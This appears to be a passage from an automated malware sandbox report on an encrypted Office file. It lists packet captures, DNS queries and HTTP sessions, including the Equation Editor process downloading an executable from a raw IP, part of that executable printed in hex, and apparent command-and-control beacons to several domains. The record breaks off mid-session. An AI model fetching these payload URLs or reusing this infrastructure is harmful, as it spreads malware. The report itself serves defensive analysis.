                                                                                                                                                                    Data ASCII:Q . . . . . . . . " B . . $ c . . . ) . = . . . . | . . C . . b J . q + d x . . . . . . . . k o . G 2 . } . . . . . . . . . . 3 a . . P s . . j . . { S . . ` y | S p s . a . j . . { S . . ` y | S p s . a . j . . { S . . ` y | S p s . a . j . . { S . . ` y | S p s . a . j . . { S . . ` y | S p s . a . j . . { S . . ` y | S p s . a . j . . { S . . ` y | S p s . a . j . . { S . . ` y | S p s . a . j . . { S . . ` y | S p s . a . j . . { S . . ` y | S p s . a . j . . { S . . ` y | S p s . a . j . . { S . . `
                                                                                                                                                                    Data Raw:51 f8 02 00 00 00 00 00 97 22 42 bb 09 24 63 18 db 8d 29 07 3d 15 d9 f5 20 92 7c 19 12 43 13 d9 62 4a e9 71 2b 64 78 10 a6 b5 1c a7 dd 0c 0e 6b 6f 10 47 32 a1 7d f8 9c ce 91 a9 1f 1c b2 8f e7 33 61 d1 9a 50 73 fc ca 6a 15 1b 7b 53 ed 0f 60 79 7c 53 70 73 b2 61 b9 6a 15 1b 7b 53 ed 0f 60 79 7c 53 70 73 b2 61 b9 6a 15 1b 7b 53 ed 0f 60 79 7c 53 70 73 b2 61 b9 6a 15 1b 7b 53 ed 0f 60
                                                                                                                                                                    Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:EncryptionInfo
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:224
                                                                                                                                                                    Entropy:4.58293386159
                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                    Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . T . . . . ] . . " . ~ . g . . . J . . . W S + . . n 2 . : . . . . . ? . . . ? . @ d . _ . 4 . a . . . 1 B | . . . = . . . E . . ^ .
                                                                                                                                                                    Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                    11/26/20-21:23:30.852283TCP1201ATTACK-RESPONSES 403 Forbidden804916634.102.136.180192.168.2.22

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Nov 26, 2020 21:22:22.985236883 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.103699923 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.103852034 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.104727983 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.224294901 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.224359989 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.224399090 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.224436998 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.224500895 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.224546909 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.224554062 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.342739105 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.342808008 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.342848063 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.342885971 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.342926025 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.342940092 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.342964888 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.342977047 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.342982054 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.343009949 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.343014956 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.343059063 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.343065023 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.343107939 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461218119 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461278915 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461328030 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461370945 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461440086 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461445093 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461477041 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461481094 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461483002 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461488008 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461524010 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461534977 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461564064 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461585999 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461601973 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461602926 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461642027 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461663008 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461680889 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461688042 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461730957 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461736917 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461779118 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461788893 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461818933 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461836100 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461860895 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461867094 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461900949 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.461920023 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.461944103 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.464202881 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580070972 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580140114 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580178976 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580228090 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580239058 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580272913 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580276012 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580279112 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580284119 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580317020 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580341101 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580368042 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580388069 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580391884 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580431938 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580440998 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580459118 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580486059 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580508947 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580526114 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580540895 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580565929 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580594063 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580605030 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580615997 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580646038 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580672979 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580684900 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580703020 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580725908 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580744982 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580780029 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580782890 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580807924 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580847979 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580851078 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580888033 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580894947 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580902100 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580929041 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580945015 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                    Nov 26, 2020 21:22:23.580979109 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:22:23.580985069 CET4916580192.168.2.22198.23.212.188

                                                                                                                                                                    UDP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Nov 26, 2020 21:23:30.638622999 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                    Nov 26, 2020 21:23:30.700109959 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:23:35.861439943 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                    Nov 26, 2020 21:23:36.013988972 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:23:41.321916103 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                    Nov 26, 2020 21:23:41.657205105 CET53528388.8.8.8192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:23:47.226660013 CET6120053192.168.2.228.8.8.8
                                                                                                                                                                    Nov 26, 2020 21:23:47.579715014 CET53612008.8.8.8192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:23:53.808645964 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                    Nov 26, 2020 21:23:53.941219091 CET53495488.8.8.8192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:23:59.511954069 CET5562753192.168.2.228.8.8.8
                                                                                                                                                                    Nov 26, 2020 21:23:59.581903934 CET53556278.8.8.8192.168.2.22
                                                                                                                                                                    Nov 26, 2020 21:24:09.837415934 CET5600953192.168.2.228.8.8.8

                                                                                                                                                                    DNS Queries

                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                    Nov 26, 2020 21:23:30.638622999 CET192.168.2.228.8.8.80xa14dStandard query (0)www.myecovet.comA (IP address)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:23:35.861439943 CET192.168.2.228.8.8.80xccffStandard query (0)www.snhdt.netA (IP address)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:23:41.321916103 CET192.168.2.228.8.8.80x2e78Standard query (0)www.kapkwata.comA (IP address)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:23:47.226660013 CET192.168.2.228.8.8.80x2f03Standard query (0)www.penrosecondos-official.comA (IP address)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:23:53.808645964 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.teleeducationforafghanistan.comA (IP address)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:23:59.511954069 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.thevirginiahomesource.comA (IP address)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:24:09.837415934 CET192.168.2.228.8.8.80xf09aStandard query (0)www.teddij.comA (IP address)IN (0x0001)

                                                                                                                                                                    DNS Answers

                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                    Nov 26, 2020 21:23:30.700109959 CET8.8.8.8192.168.2.220xa14dNo error (0)www.myecovet.commyecovet.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:23:30.700109959 CET8.8.8.8192.168.2.220xa14dNo error (0)myecovet.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:23:36.013988972 CET8.8.8.8192.168.2.220xccffNo error (0)www.snhdt.netreachlocal.cloudbackend.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:23:36.013988972 CET8.8.8.8192.168.2.220xccffNo error (0)reachlocal.cloudbackend.net104.130.255.68A (IP address)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:23:41.657205105 CET8.8.8.8192.168.2.220x2e78No error (0)www.kapkwata.com154.215.9.186A (IP address)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:23:47.579715014 CET8.8.8.8192.168.2.220x2f03No error (0)www.penrosecondos-official.compenrosecondos-official.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:23:47.579715014 CET8.8.8.8192.168.2.220x2f03No error (0)penrosecondos-official.com101.100.209.140A (IP address)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:23:53.941219091 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.teleeducationforafghanistan.com74.220.199.6A (IP address)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:23:59.581903934 CET8.8.8.8192.168.2.220x6ec7No error (0)www.thevirginiahomesource.comthevirginiahomesource.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Nov 26, 2020 21:23:59.581903934 CET8.8.8.8192.168.2.220x6ec7No error (0)thevirginiahomesource.com198.101.172.217A (IP address)IN (0x0001)

                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                    • 198.23.212.188
                                                                                                                                                                    • www.myecovet.com
                                                                                                                                                                    • www.snhdt.net
                                                                                                                                                                    • www.kapkwata.com
                                                                                                                                                                    • www.penrosecondos-official.com
                                                                                                                                                                    • www.teleeducationforafghanistan.com
                                                                                                                                                                    • www.thevirginiahomesource.com

                                                                                                                                                                    HTTP Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    0192.168.2.2249165198.23.212.18880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    Nov 26, 2020 21:22:23.104727983 CET0OUTGET /reg/vbc.exe HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                    Host: 198.23.212.188
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Nov 26, 2020 21:22:23.224294901 CET1INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 26 Nov 2020 20:22:22 GMT
                                                                                                                                                                    Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11
                                                                                                                                                                    Last-Modified: Thu, 26 Nov 2020 15:58:02 GMT
                                                                                                                                                                    ETag: "79a00-5b5049bd7f7fe"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Content-Length: 498176
                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 cb bf 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 8e 07 00 00 0a 00 00 00 00 00 00 26 ac 07 00 00 20 00 00 00 c0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 ab 07 00 4f 00 00 00 00 c0 07 00 14 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5c 8c 07 00 00 20 00 00 00 8e 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 06 00 00 00 c0 07 00 00 08 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 07 00 00 02 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 ac 07 00 00 00 00 00 48 00 00 00 02 00 05 00 48 9a 00 00 94 85 00 00 03 00 00 00 8c 00 00 06 dc 1f 01 00 f8 8b 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 9a 02 73 19 00 00 0a 7d 07 00 00 04 02 7e 1a 00 00 0a 7d 08 00 00 04 02 28 1b 00 00 0a 00 00 02 28 07 00 00 06 00 2a 1b 30 01 00 14 00 00 00 00 00 00 00 00 00 02 28 08 00 00 06 00 de 08 02 28 0f 00 00 0a 00 dc 2a 01 10 00 00 02 00 01 00 0a 0b 00 08 00 00 00 00 13 30 05 00 34 00 00 00 02 00 00 11 00 72 01 00 00 70 28 0d 00 00 06 0a 02 02 fe 06 09 00 00 06 73 c2 00 00 06 7d 01 00 00 04 02 1f 0d 02 7b 01 00 00 04 06 16 28 0a 00 00 06 7d 08 00 00 04 2a 3a 00 02 7b 08 00 00 04 28 0b 00 00 06 26 2a 00 13 30 04 00 c0 00 00 00 03 00 00 11 00 03 16 fe 04 16 fe 01 0a 06 39 9c 00 00 00 00
                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$_0& @ @O H.text\ `.rsrc@@.reloc@BHH0){(t|(+3*0){(t|(+3*0){(t|(+3*0){(t|(+3*s}~}((*0((*04rp(s}{(}*:{(&*09


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    1192.168.2.224916634.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    Nov 26, 2020 21:23:30.736526012 CET527OUTGET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=jNDZ6p/mqvXz+lV8Z3ikV5w1yZNnar/gT18SrTzuUceB+Xpt3Ns987IJweZa7faZLQZG0w== HTTP/1.1
                                                                                                                                                                    Host: www.myecovet.com
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    Nov 26, 2020 21:23:30.852283001 CET528INHTTP/1.1 403 Forbidden
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Thu, 26 Nov 2020 20:23:30 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 275
                                                                                                                                                                    ETag: "5fb7c9ca-113"
                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    2192.168.2.2249167104.130.255.6880C:\Windows\explorer.exe
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    Nov 26, 2020 21:23:36.179626942 CET529OUTGET /coz3/?MPxhwJ=vQj7cG2IwCBebrWG7gzNgppGgW/+TNOkvFpT9t0IQRDO6wT6r+9Ecp7CibhH0Ta6s7MNzw==&Nxl0wV=htxXA6k0ApBh HTTP/1.1
                                                                                                                                                                    Host: www.snhdt.net
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    Nov 26, 2020 21:23:36.311877966 CET529INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                    Server: nginx/1.10.3
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Date: Thu, 26 Nov 2020 20:23:36 GMT
                                                                                                                                                                    Location: https://www.snhdt.net/coz3/?MPxhwJ=vQj7cG2IwCBebrWG7gzNgppGgW/+TNOkvFpT9t0IQRDO6wT6r+9Ecp7CibhH0Ta6s7MNzw==&Nxl0wV=htxXA6k0ApBh
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Length: 185
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.10.3</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    3192.168.2.2249168154.215.9.18680C:\Windows\explorer.exe
                                                                                                                                                                    TimestampkBytes transferredDirectionData
